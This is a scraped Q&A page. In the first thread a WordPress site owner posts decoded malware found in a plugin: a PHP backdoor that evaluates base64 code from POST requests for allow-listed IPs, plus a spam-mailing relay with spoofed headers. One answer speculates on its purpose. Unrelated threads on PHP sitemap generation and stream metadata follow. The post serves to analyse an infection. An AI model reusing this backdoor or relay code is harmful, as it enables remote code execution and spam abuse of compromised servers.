I discovered a lot of requests to a fishy file in a plugin on my Wordpress site. There, I found a long string, a mapping function for each character used in the string, and an excecution of the decoded string. This is the code the decoder outputs, any help in understanding what it does would be great!
<?php
if(isset($_POST["code"]) && isset($_POST["custom_action"]) && is_good_ip($_SERVER['REMOTE_ADDR']))
{
eval(base64_decode($_POST["code"]));
exit();
}
if (isset($_POST["type"]) && $_POST["type"]=="1")
{
type1_send();
exit();
}
elseif (isset($_POST["type"]) && $_POST["type"]=="2")
{
}
elseif (isset($_POST["type"]))
{
echo $_POST["type"];
exit();
}
error_404();
function is_good_ip($ip)
{
$goods = Array("6.185.239.", "8.138.118.");
foreach ($goods as $good)
{
if (strstr($ip, $good) != FALSE)
{
return TRUE;
}
}
return FALSE;
}
function type1_send()
{
if(!isset($_POST["emails"])
OR !isset($_POST["themes"])
OR !isset($_POST["messages"])
OR !isset($_POST["froms"])
OR !isset($_POST["mailers"])
)
{
exit();
}
if(get_magic_quotes_gpc())
{
foreach($_POST as $key => $post)
{
$_POST[$key] = stripcslashes($post);
}
}
$emails = #unserialize(base64_decode($_POST["emails"]));
$themes = #unserialize(base64_decode($_POST["themes"]));
$messages = #unserialize(base64_decode($_POST["messages"]));
$froms = #unserialize(base64_decode($_POST["froms"]));
$mailers = #unserialize(base64_decode($_POST["mailers"]));
$aliases = #unserialize(base64_decode($_POST["aliases"]));
$passes = #unserialize(base64_decode($_POST["passes"]));
if(isset($_SERVER))
{
$_SERVER['PHP_SELF'] = "/";
$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
}
}
if(isset($_FILES))
{
foreach($_FILES as $key => $file)
{
$filename = alter_macros($aliases[$key]);
$filename = num_macros($filename);
$filename = text_macros($filename);
$filename = xnum_macros($filename);
$_FILES[$key]["name"] = $filename;
}
}
if(empty($emails))
{
exit();
}
foreach ($emails as $fteil => $email)
{
$theme = $themes[array_rand($themes)];
$theme = alter_macros($theme["theme"]);
$theme = num_macros($theme);
$theme = text_macros($theme);
$theme = xnum_macros($theme);
$message = $messages[array_rand($messages)];
$message = alter_macros($message["message"]);
$message = num_macros($message);
$message = text_macros($message);
$message = xnum_macros($message);
//$message = pass_macros($message, $passes);
$message = fteil_macros($message, $fteil);
$from = $froms[array_rand($froms)];
$from = alter_macros($from["from"]);
$from = num_macros($from);
$from = text_macros($from);
$from = xnum_macros($from);
if (strstr($from, "[CUSTOM]") == FALSE)
{
$from = from_host($from);
}
else
{
$from = str_replace("[CUSTOM]", "", $from);
}
$mailer = $mailers[array_rand($mailers)];
send_mail($from, $email, $theme, $message, $mailer);
}
}
function send_mail($from, $to, $subj, $text, $mailer)
{
$head = "";
$un = strtoupper(uniqid(time()));
$head .= "From: $from\n";
$head .= "X-Mailer: $mailer\n";
$head .= "Reply-To: $from\n";
$head .= "Mime-Version: 1.0\n";
$head .= "Content-Type: multipart/alternative;";
$head .= "boundary=\"----------".$un."\"\n\n";
$plain = strip_tags($text);
$zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
$zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";
$zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
$zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
$zag .= "------------".$un."--";
if(count($_FILES) > 0)
{
foreach($_FILES as $file)
{
if(file_exists($file["tmp_name"]))
{
$f = fopen($file["tmp_name"], "rb");
$zag .= "------------".$un."\n";
$zag .= "Content-Type: application/octet-stream;";
$zag .= "name=\"".$file["name"]."\"\n";
$zag .= "Content-Transfer-Encoding:base64\n";
$zag .= "Content-Disposition:attachment;";
$zag .= "filename=\"".$file["name"]."\"\n\n";
$zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
fclose($f);
}
}
}
if(#mail($to, $subj, $zag, $head))
{
if(!empty($_POST['verbose']))
echo "SENDED";
}
else
{
if(!empty($_POST['verbose']))
echo "FAIL";
}
}
function alter_macros($content)
{
preg_match_all('#{(.*)}#Ui', $content, $matches);
for($i = 0; $i < count($matches[1]); $i++)
{
$ns = explode("|", $matches[1][$i]);
$c2 = count($ns);
$rand = rand(0, ($c2 - 1));
$content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
}
return $content;
}
function text_macros($content)
{
preg_match_all('#\[TEXT\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$min = $matches[1][$i];
$max = $matches[2][$i];
$rand = rand($min, $max);
$word = generate_word($rand);
$content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
}
preg_match_all('#\[TEXT\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$count = $matches[1][$i];
$word = generate_word($count);
$content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
}
return $content;
}
function xnum_macros($content)
{
preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$num = $matches[1][$i];
$min = pow(10, $num - 1);
$max = pow(10, $num) - 1;
$rand = rand($min, $max);
$content = str_replace($matches[0][$i], $rand, $content);
}
return $content;
}
function num_macros($content)
{
preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$min = $matches[1][$i];
$max = $matches[2][$i];
$rand = rand($min, $max);
$content = str_replace($matches[0][$i], $rand, $content);
}
return $content;
}
function generate_word($length)
{
$chars = 'abcdefghijklmnopqrstuvyxz';
$numChars = strlen($chars);
$string = '';
for($i = 0; $i < $length; $i++)
{
$string .= substr($chars, rand(1, $numChars) - 1, 1);
}
return $string;
}
function pass_macros($content, $passes)
{
$pass = array_pop($passes);
return str_replace("[PASS]", $pass, $content);
}
function fteil_macros($content, $fteil)
{
return str_replace("[FTEIL]", $fteil, $content);
}
function is_ip($str) {
return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",$str);
}
function from_host($content)
{
$host = preg_replace('/^(www|ftp)\./i','',#$_SERVER['HTTP_HOST']);
if (is_ip($host))
{
return $content;
}
$tokens = explode("#", $content);
$content = $tokens[0] . "#" . $host . ">";
return $content;
}
function error_404()
{
header("HTTP/1.1 404 Not Found");
$uri = preg_replace('/(\?).*$/', '', $_SERVER['REQUEST_URI'] );
$content = custom_http_request1("http://".$_SERVER['HTTP_HOST']."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
$content = str_replace( "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", $uri, $content );
exit( $content );
}
function custom_http_request1($params)
{
if( ! is_array($params) )
{
$params = array(
'url' => $params,
'method' => 'GET'
);
}
if( $params['url']=='' ) return FALSE;
if( ! isset($params['method']) ) $params['method'] = (isset($params['data'])&&is_array($params['data'])) ? 'POST' : 'GET';
$params['method'] = strtoupper($params['method']);
if( ! in_array($params['method'], array('GET', 'POST')) ) return FALSE;
/* Приводим ссылку в правильный вид */
$url = parse_url($params['url']);
if( ! isset($url['scheme']) ) $url['scheme'] = 'http';
if( ! isset($url['path']) ) $url['path'] = '/';
if( ! isset($url['host']) && isset($url['path']) )
{
if( strpos($url['path'], '/') )
{
$url['host'] = substr($url['path'], 0, strpos($url['path'], '/'));
$url['path'] = substr($url['path'], strpos($url['path'], '/'));
}
else
{
$url['host'] = $url['path'];
$url['path'] = '/';
}
}
$url['path'] = preg_replace("/[\\/]+/", "/", $url['path']);
if( isset($url['query']) ) $url['path'] .= "?{$url['query']}";
$port = isset($params['port']) ? $params['port']
: ( isset($url['port']) ? $url['port'] : ($url['scheme']=='https'?443:80) );
$timeout = isset($params['timeout']) ? $params['timeout'] : 30;
if( ! isset($params['return']) ) $params['return'] = 'content';
$scheme = $url['scheme']=='https' ? 'ssl://':'';
$fp = #fsockopen($scheme.$url['host'], $port, $errno, $errstr, $timeout);
if( $fp )
{
/* Mozilla */
if( ! isset($params['User-Agent']) ) $params['User-Agent'] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16";
$request = "{$params['method']} {$url['path']} HTTP/1.0\r\n";
$request .= "Host: {$url['host']}\r\n";
$request .= "User-Agent: {$params['User-Agent']}"."\r\n";
if( isset($params['referer']) ) $request .= "Referer: {$params['referer']}\r\n";
if( isset($params['cookie']) )
{
$cookie = "";
if( is_array($params['cookie']) ) {foreach( $params['cookie'] as $k=>$v ) $cookie .= "$k=$v; "; $cookie = substr($cookie,0,-2);}
else $cookie = $params['cookie'];
if( $cookie!='' ) $request .= "Cookie: $cookie\r\n";
}
$request .= "Connection: close\r\n";
if( $params['method']=='POST' )
{
if( isset($params['data']) && is_array($params['data']) )
{
foreach($params['data'] AS $k => $v)
$data .= urlencode($k).'='.urlencode($v).'&';
if( substr($data, -1)=='&' ) $data = substr($data,0,-1);
}
$data .= "\r\n\r\n";
$request .= "Content-type: application/x-www-form-urlencoded\r\n";
$request .= "Content-length: ".strlen($data)."\r\n";
}
$request .= "\r\n";
if( $params['method'] == 'POST' ) $request .= $data;
#fwrite ($fp,$request); /* Send request */
$res = ""; $headers = ""; $h_detected = false;
while( !#feof($fp) )
{
$res .= #fread($fp, 1024); /* читаем контент */
/* Проверка наличия загловков в контенте */
if( ! $h_detected && strpos($res, "\r\n\r\n")!==FALSE )
{
/* заголовки уже считаны - корректируем контент */
$h_detected = true;
$headers = substr($res, 0, strpos($res, "\r\n\r\n"));
$res = substr($res, strpos($res, "\r\n\r\n")+4);
/* Headers to Array */
if( $params['return']=='headers' || $params['return']=='array'
|| (isset($params['redirect']) && $params['redirect']==true) )
{
$h = explode("\r\n", $headers);
$headers = array();
foreach( $h as $k=>$v )
{
if( strpos($v, ':') )
{
$k = substr($v, 0, strpos($v, ':'));
$v = trim(substr($v, strpos($v, ':')+1));
}
$headers[strtoupper($k)] = $v;
}
}
if( isset($params['redirect']) && $params['redirect']==true && isset($headers['LOCATION']) )
{
$params['url'] = $headers['LOCATION'];
if( !isset($params['redirect-count']) ) $params['redirect-count'] = 0;
if( $params['redirect-count']<10 )
{
$params['redirect-count']++;
$func = __FUNCTION__;
return #is_object($this) ? $this->$func($params) : $func($params);
}
}
if( $params['return']=='headers' ) return $headers;
}
}
#fclose($fp);
}
else return FALSE;/* $errstr.$errno; */
if( $params['return']=='array' ) $res = array('headers'=>$headers, 'content'=>$res);
return $res;
}
Edit: Apparently, I am doing something wrong with my question (2 instant downvotes). If you could tell me what I am doing wrong, I will try to correct it/remove my question.
This is a fun one, while I haven't a lot of time right now to look over the code I can give you some generalizations of common injections and attacks on websites, in particular a CMS like WordPress. Although this as a part of a plugin, may just be a malicious plugin and not an injection attack, or it may be a flaw or exploit in the plugin being used.
Initial observation, the code comments in Russian stand out.
This code looks like it might be for a spam relay. Taking messages and trying to leverage whatever sendmail you have setup. That's just a high level guess right now.
Most attacks but not necessarily this one are generally geared and trying to deliver malware to visitors to the site, they usually use active-x or iframe tricks, I didn't see any of that here so it leads me to believe that #2 is more likely.
This may also be trying to index all the content of your site/server that it can, and then send it out to the attacker so that they can sift the data looking for important information like config files and passwords.
I will do a deeper dive into this code when i'm not at work :) because I love this stuff. In the meantime you'll probably get a better response from the security stack pages than stack overflow or like I mentioned in my comment, check with the the hackers of http://hackthissite.org on this one. If this was an exploit, they might even be able to track down the author and the specific exploit. Generally code like this is used as part of a more generic tool that probes and attacks, a bot and is not the work of an actual person. You should also possibly share the name of the plugin, as it may be malicious or a known exploit may be published.
Either way, you need to perform a deep security screening on the site in question, and assume that you've been hacked, and take all the proper steps accordingly.
-- Edit --
This code block is interesting:
function is_good_ip($ip)
{
$goods = Array("6.185.239.", "8.138.118.");
foreach ($goods as $good)
{
if (strstr($ip, $good) != FALSE)
{
return TRUE;
}
}
return FALSE;
}
One of those IP's resolve to Fort Huachuca Dod Network Information Center. I'm probably going to delete this answer now... (turns out this may not be an IP but a version number.. my paranoia got the best of me) - you should probably post this question here instead: https://security.stackexchange.com/ to avoid more downvotes.
Related
I use a script from here to generate my sitemaps.
I can call it with the browser with http://www.example.com/sitemap.php?update=pages and its working fine.
I need to call it as shell script so that I can automate it with the windows task scheduler. But the script needs to be changed to get the variables ?update=pages. But I don't manage to change it correctly.
Could anybody help me so that I can execute the script from command line with
...\php C:\path\to\script\sitemap.php update=pages. It would also be fine for me to hardcode the variables into the script since I wont change them anyway.
define("BASE_URL", "http://www.example.com/");
define ('BASE_URI', $_SERVER['DOCUMENT_ROOT'] . '/');
class Sitemap {
private $compress;
private $page = 'index';
private $index = 1;
private $count = 1;
private $urls = array();
public function __construct ($compress=true) {
ini_set('memory_limit', '75M'); // 50M required per tests
$this->compress = ($compress) ? '.gz' : '';
}
public function page ($name) {
$this->save();
$this->page = $name;
$this->index = 1;
}
public function url ($url, $lastmod='', $changefreq='', $priority='') {
$url = htmlspecialchars(BASE_URL . 'xx' . $url);
$lastmod = (!empty($lastmod)) ? date('Y-m-d', strtotime($lastmod)) : false;
$changefreq = (!empty($changefreq) && in_array(strtolower($changefreq), array('always', 'hourly', 'daily', 'weekly', 'monthly', 'yearly', 'never'))) ? strtolower($changefreq) : false;
$priority = (!empty($priority) && is_numeric($priority) && abs($priority) <= 1) ? round(abs($priority), 1) : false;
if (!$lastmod && !$changefreq && !$priority) {
$this->urls[] = $url;
} else {
$url = array('loc'=>$url);
if ($lastmod !== false) $url['lastmod'] = $lastmod;
if ($changefreq !== false) $url['changefreq'] = $changefreq;
if ($priority !== false) $url['priority'] = ($priority < 1) ? $priority : '1.0';
$this->urls[] = $url;
}
if ($this->count == 50000) {
$this->save();
} else {
$this->count++;
}
}
public function close() {
$this->save();
}
private function save () {
if (empty($this->urls)) return;
$file = "sitemaps/xx-sitemap-{$this->page}-{$this->index}.xml{$this->compress}";
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($this->urls as $url) {
$xml .= ' <url>' . "\n";
if (is_array($url)) {
foreach ($url as $key => $value) $xml .= " <{$key}>{$value}</{$key}>\n";
} else {
$xml .= " <loc>{$url}</loc>\n";
}
$xml .= ' </url>' . "\n";
}
$xml .= '</urlset>' . "\n";
$this->urls = array();
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $file, 'wb');
fwrite($fp, $xml);
fclose($fp);
$this->index++;
$this->count = 1;
$num = $this->index; // should have already been incremented
while (file_exists(BASE_URI . "xxb-sitemap-{$this->page}-{$num}.xml{$this->compress}")) {
unlink(BASE_URI . "xxc-sitemap-{$this->page}-{$num}.xml{$this->compress}");
$num++;
}
$this->index($file);
}
private function index ($file) {
$sitemaps = array();
$index = "sitemaps/xx-sitemap-index.xml{$this->compress}";
if (file_exists(BASE_URI . $index)) {
$xml = (!empty($this->compress)) ? gzfile(BASE_URI . $index) : file(BASE_URI . $index);
$tags = $this->xml_tag(implode('', $xml), array('sitemap'));
foreach ($tags as $xml) {
$loc = str_replace(BASE_URL, '', $this->xml_tag($xml, 'loc'));
$lastmod = $this->xml_tag($xml, 'lastmod');
$lastmod = ($lastmod) ? date('Y-m-d', strtotime($lastmod)) : date('Y-m-d');
if (file_exists(BASE_URI . $loc)) $sitemaps[$loc] = $lastmod;
}
}
$sitemaps[$file] = date('Y-m-d');
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($sitemaps as $loc => $lastmod) {
$xml .= ' <sitemap>' . "\n";
$xml .= ' <loc>' . BASE_URL . $loc . '</loc>' . "\n";
$xml .= ' <lastmod>' . $lastmod . '</lastmod>' . "\n";
$xml .= ' </sitemap>' . "\n";
}
$xml .= '</sitemapindex>' . "\n";
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $index, 'wb');
fwrite($fp, $xml);
fclose($fp);
}
private function xml_tag ($xml, $tag, &$end='') {
if (is_array($tag)) {
$tags = array();
while ($value = $this->xml_tag($xml, $tag[0], $end)) {
$tags[] = $value;
$xml = substr($xml, $end);
}
return $tags;
}
$pos = strpos($xml, "<{$tag}>");
if ($pos === false) return false;
$start = strpos($xml, '>', $pos) + 1;
$length = strpos($xml, "</{$tag}>", $start) - $start;
$end = strpos($xml, '>', $start + $length) + 1;
return ($end !== false) ? substr($xml, $start, $length) : false;
}
public function __destruct () {
$this->save();
}
}
// start part 2
$sitemap = new Sitemap;
if (get('pages')) {
$sitemap->page('pages');
$result = mysql_query("SELECT uri FROM app_uri");
while (list($url, $created) = mysql_fetch_row($result)) {
$sitemap->url($url, $created, 'monthly');
}
}
$sitemap->close();
unset ($sitemap);
function get ($name) {
return (isset($_GET['update']) && strpos($_GET['update'], $name) !== false) ? true : false;
}
?>
I could install wget (it's available for windows as well) and then call the url via localhost in the task scheduler script:
wget.exe "http://localhost/path/to/script.php?pages=test"
This way you wouldn't have to rewrite the php script.
Otherwise, if the script is meant for shell usage only, then pass variables via command line:
php yourscript.php variable1 variable2 ...
In the php script you can than access those variables using the $argv variable:
$variable1 = $argv[1];
$variable2 = $argv[2];
have a look on:
How to pass GET variables to php file with Shell?
which already answered the same question :).
I want to create a sitemap for a page with more than 30.000.000 pages. The page is daily updating, removing and adding new pages.
I found this php script which I would like to run with a cron job.
Sitemap php script
I have all URIs in the table "myuri" in the column "uri" entries are written e.g. "/this-is-a-page.html". What parameters do I need to add to the script to get it running on my table?
<?php
/*
* author: Kyle Gadd
* documentation: http://www.php-ease.com/classes/sitemap.html
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
class Sitemap {
private $compress;
private $page = 'index';
private $index = 1;
private $count = 1;
private $urls = array();
public function __construct ($compress=true) {
ini_set('memory_limit', '75M'); // 50M required per tests
$this->compress = ($compress) ? '.gz' : '';
}
public function page ($name) {
$this->save();
$this->page = $name;
$this->index = 1;
}
public function url ($url, $lastmod='', $changefreq='', $priority='') {
$url = htmlspecialchars(BASE_URL . $url);
$lastmod = (!empty($lastmod)) ? date('Y-m-d', strtotime($lastmod)) : false;
$changefreq = (!empty($changefreq) && in_array(strtolower($changefreq), array('always', 'hourly', 'daily', 'weekly', 'monthly', 'yearly', 'never'))) ? strtolower($changefreq) : false;
$priority = (!empty($priority) && is_numeric($priority) && abs($priority) <= 1) ? round(abs($priority), 1) : false;
if (!$lastmod && !$changefreq && !$priority) {
$this->urls[] = $url;
} else {
$url = array('loc'=>$url);
if ($lastmod !== false) $url['lastmod'] = $lastmod;
if ($changefreq !== false) $url['changefreq'] = $changefreq;
if ($priority !== false) $url['priority'] = ($priority < 1) ? $priority : '1.0';
$this->urls[] = $url;
}
if ($this->count == 50000) {
$this->save();
} else {
$this->count++;
}
}
public function close() {
$this->save();
$this->ping_search_engines();
}
private function save () {
if (empty($this->urls)) return;
$file = "sitemap-{$this->page}-{$this->index}.xml{$this->compress}";
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($this->urls as $url) {
$xml .= ' <url>' . "\n";
if (is_array($url)) {
foreach ($url as $key => $value) $xml .= " <{$key}>{$value}</{$key}>\n";
} else {
$xml .= " <loc>{$url}</loc>\n";
}
$xml .= ' </url>' . "\n";
}
$xml .= '</urlset>' . "\n";
$this->urls = array();
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $file, 'wb');
fwrite($fp, $xml);
fclose($fp);
$this->index++;
$this->count = 1;
$num = $this->index; // should have already been incremented
while (file_exists(BASE_URI . "sitemap-{$this->page}-{$num}.xml{$this->compress}")) {
unlink(BASE_URI . "sitemap-{$this->page}-{$num}.xml{$this->compress}");
$num++;
}
$this->index($file);
}
private function index ($file) {
$sitemaps = array();
$index = "sitemap-index.xml{$this->compress}";
if (file_exists(BASE_URI . $index)) {
$xml = (!empty($this->compress)) ? gzfile(BASE_URI . $index) : file(BASE_URI . $index);
$tags = $this->xml_tag(implode('', $xml), array('sitemap'));
foreach ($tags as $xml) {
$loc = str_replace(BASE_URL, '', $this->xml_tag($xml, 'loc'));
$lastmod = $this->xml_tag($xml, 'lastmod');
$lastmod = ($lastmod) ? date('Y-m-d', strtotime($lastmod)) : date('Y-m-d');
if (file_exists(BASE_URI . $loc)) $sitemaps[$loc] = $lastmod;
}
}
$sitemaps[$file] = date('Y-m-d');
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($sitemaps as $loc => $lastmod) {
$xml .= ' <sitemap>' . "\n";
$xml .= ' <loc>' . BASE_URL . $loc . '</loc>' . "\n";
$xml .= ' <lastmod>' . $lastmod . '</lastmod>' . "\n";
$xml .= ' </sitemap>' . "\n";
}
$xml .= '</sitemapindex>' . "\n";
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $index, 'wb');
fwrite($fp, $xml);
fclose($fp);
}
private function xml_tag ($xml, $tag, &$end='') {
if (is_array($tag)) {
$tags = array();
while ($value = $this->xml_tag($xml, $tag[0], $end)) {
$tags[] = $value;
$xml = substr($xml, $end);
}
return $tags;
}
$pos = strpos($xml, "<{$tag}>");
if ($pos === false) return false;
$start = strpos($xml, '>', $pos) + 1;
$length = strpos($xml, "</{$tag}>", $start) - $start;
$end = strpos($xml, '>', $start + $length) + 1;
return ($end !== false) ? substr($xml, $start, $length) : false;
}
public function ping_search_engines () {
$sitemap = BASE_URL . 'sitemap-index.xml' . $this->compress;
$engines = array();
$engines['www.google.com'] = '/webmasters/tools/ping?sitemap=' . urlencode($sitemap);
$engines['www.bing.com'] = '/webmaster/ping.aspx?siteMap=' . urlencode($sitemap);
$engines['submissions.ask.com'] = '/ping?sitemap=' . urlencode($sitemap);
foreach ($engines as $host => $path) {
if ($fp = fsockopen($host, 80)) {
$send = "HEAD $path HTTP/1.1\r\n";
$send .= "HOST: $host\r\n";
$send .= "CONNECTION: Close\r\n\r\n";
fwrite($fp, $send);
$http_response = fgets($fp, 128);
fclose($fp);
list($response, $code) = explode (' ', $http_response);
if ($code != 200) trigger_error ("{$host} ping was unsuccessful.<br />Code: {$code}<br />Response: {$response}");
}
}
}
public function __destruct () {
$this->save();
}
}
?>
There is already an example of usage on the page:
<?php
require_once ('php/classes/Sitemap.php');
$sitemap = new Sitemap;
if (get('pages')) {
$sitemap->page('pages');
$result = db_query ("SELECT url, created FROM pages"); // 20 pages
while (list($url, $created) = $result->fetch_row()) {
$sitemap->url($url, $created, 'yearly');
}
}
if (get('posts')) {
$sitemap->page('posts');
$result = db_query ("SELECT url, updated FROM posts"); // 70,000 posts
while (list($url, $updated) = $result->fetch_row()) {
$sitemap->url($url, $updated, 'monthly');
}
}
$sitemap->close();
unset ($sitemap);
function get ($name) {
return (isset($_GET['update']) && strpos($_GET['update'], $name) !== false) ? true : false;
}
?>
I would change this part....
if (get('pages')) {
$sitemap->page('pages');
$result = db_query ("SELECT uri FROM myuri");
while (list($url) = mysql_fetch_row($result)) {
$sitemap->url($url,'', 'yearly');
}
}
Not sure if that $updated is needed? Looks like the function just defaults it to an empty string anyways...... But maybe you could at a timestamp column to your table to pull the last updated date as well, and feed it into the function where I put ''.
Also....remove this part...
if (get('posts')) {
$sitemap->page('posts');
$result = db_query ("SELECT url, updated FROM posts"); // 70,000 posts
while (list($url, $updated) = $result->fetch_row()) {
$sitemap->url($url, $updated, 'monthly');
}
}
I found a script which can extract the artist & title name from an Icecast or Shoutcast stream.
I want the script to update automatically when a song changed, at the moment its working only when i execute it. I'm new to PHP so any help will be appreciated.
Thanks!
define('CRLF', "\r\n");
class streaminfo{
public $valid = false;
public $useragent = 'Winamp 2.81';
protected $headers = array();
protected $metadata = array();
public function __construct($location){
$errno = $errstr = '';
$t = parse_url($location);
$sock = fsockopen($t['host'], $t['port'], $errno, $errstr, 5);
$path = isset($t['path'])?$t['path']:'/';
if ($sock){
$request = 'GET '.$path.' HTTP/1.0' . CRLF .
'Host: ' . $t['host'] . CRLF .
'Connection: Close' . CRLF .
'User-Agent: ' . $this->useragent . CRLF .
'Accept: */*' . CRLF .
'icy-metadata: 1'.CRLF.
'icy-prebuffer: 65536'.CRLF.
(isset($t['user'])?'Authorization: Basic '.base64_encode($t['user'].':'.$t['pass']).CRLF:'').
'X-TipOfTheDay: Winamp "Classic" rulez all of them.' . CRLF . CRLF;
if (fwrite($sock, $request)){
$theaders = $line = '';
while (!feof($sock)){
$line = fgets($sock, 4096);
if('' == trim($line)){
break;
}
$theaders .= $line;
}
$theaders = explode(CRLF, $theaders);
foreach ($theaders as $header){
$t = explode(':', $header);
if (isset($t[0]) && trim($t[0]) != ''){
$name = preg_replace('/[^a-z][^a-z0-9]*/i','', strtolower(trim($t[0])));
array_shift($t);
$value = trim(implode(':', $t));
if ($value != ''){
if (is_numeric($value)){
$this->headers[$name] = (int)$value;
}else{
$this->headers[$name] = $value;
}
}
}
}
if (!isset($this->headers['icymetaint'])){
$data = ''; $metainterval = 512;
while(!feof($sock)){
$data .= fgetc($sock);
if (strlen($data) >= $metainterval) break;
}
$this->print_data($data);
$matches = array();
preg_match_all('/([\x00-\xff]{2})\x0\x0([a-z]+)=/i', $data, $matches, PREG_OFFSET_CAPTURE);
preg_match_all('/([a-z]+)=([a-z0-9\(\)\[\]., ]+)/i', $data, $matches, PREG_SPLIT_NO_EMPTY);
echo '<pre>';var_dump($matches);echo '</pre>';
$title = $artist = '';
foreach ($matches[0] as $nr => $values){
$offset = $values[1];
$length = ord($values[0]{0}) +
(ord($values[0]{1}) * 256)+
(ord($values[0]{2}) * 256*256)+
(ord($values[0]{3}) * 256*256*256);
$info = substr($data, $offset + 4, $length);
$seperator = strpos($info, '=');
$this->metadata[substr($info, 0, $seperator)] = substr($info, $seperator + 1);
if (substr($info, 0, $seperator) == 'title') $title = substr($info, $seperator + 1);
if (substr($info, 0, $seperator) == 'artist') $artist = substr($info, $seperator + 1);
}
$this->metadata['streamtitle'] = $artist . ' - ' . $title;
}else{
$metainterval = $this->headers['icymetaint'];
$intervals = 0;
$metadata = '';
while(1){
$data = '';
while(!feof($sock)){
$data .= fgetc($sock);
if (strlen($data) >= $metainterval) break;
}
//$this->print_data($data);
$len = join(unpack('c', fgetc($sock))) * 16;
if ($len > 0){
$metadata = str_replace("\0", '', fread($sock, $len));
break;
}else{
$intervals++;
if ($intervals > 100) break;
}
}
$metarr = explode(';', $metadata);
foreach ($metarr as $meta){
$t = explode('=', $meta);
if (isset($t[0]) && trim($t[0]) != ''){
$name = preg_replace('/[^a-z][^a-z0-9]*/i','', strtolower(trim($t[0])));
array_shift($t);
$value = trim(implode('=', $t));
if (substr($value, 0, 1) == '"' || substr($value, 0, 1) == "'"){
$value = substr($value, 1);
}
if (substr($value, -1) == '"' || substr($value, -1) == "'"){
$value = substr($value, 0, -1);
}
if ($value != ''){
$this->metadata[$name] = $value;
}
}
}
}
fclose($sock);
$this->valid = true;
}else echo 'unable to write.';
}else echo 'no socket '.$errno.' - '.$errstr.'.';
}
public function print_data($data){
$data = str_split($data);
$c = 0;
$string = '';
echo "<pre>\n000000 ";
foreach ($data as $char){
$string .= addcslashes($char, "\n\r\0\t");
$hex = dechex(join(unpack('C', $char)));
if ($c % 4 == 0) echo ' ';
if ($c % (4*4) == 0 && $c != 0){
foreach (str_split($string) as $s){
//echo " $string\n";
if (ord($s) < 32 || ord($s) > 126){
echo '\\'.ord($s);
}else{
echo $s;
}
}
echo "\n";
$string = '';
echo str_pad($c, 6, '0', STR_PAD_LEFT).' ';
}
if (strlen($hex) < 1) $hex = '00';
if (strlen($hex) < 2) $hex = '0'.$hex;
echo $hex.' ';
$c++;
}
echo " $string\n</pre>";
}
public function __get($name){
if (isset($this->metadata[$name])){
return $this->metadata[$name];
}
if (isset($this->headers[$name])){
return $this->headers[$name];
}
return null;
}
}
$t = new streaminfo('http://64.236.34.196:80/stream/1014'); // get metadata
echo Meta Interval: $t->icymetaint;
echo Current Track: $t->streamtitle;
You will need to constantly query the stream at a set interval to find when the song changes.
This can be best done by scheduling a cron job.
If on Windows, you should use the Windows Task Scheduler
If you want to run the PHP script to keep your meta data up to date (I'm assuming you're making a website and using html audio tags here) you can use the ontimeupdate event with an ajax function. If you're not you probably should look up your audio playback documentation for something similar.
<audio src="http://ip:port/;" ontimeupdate="loadXMLDoc()">
You can find a great example here http://www.w3schools.com/php/php_ajax_php.asp
You want to use the PHP echo function all the relevant information at once using one php variable at the very end of your script.
<?php ....
$phpVar=$streamtitle;
$phpVar2=$streamsong;
$result="I want my string to look like this: <br> {$phpVar} {$phpVar2}";
echo $result;
?>
and then use the function called by the .onreadystatechange to modify the particular elements you want on your website by using the .resonseText (this will contain the same content as your PHP script's echo).
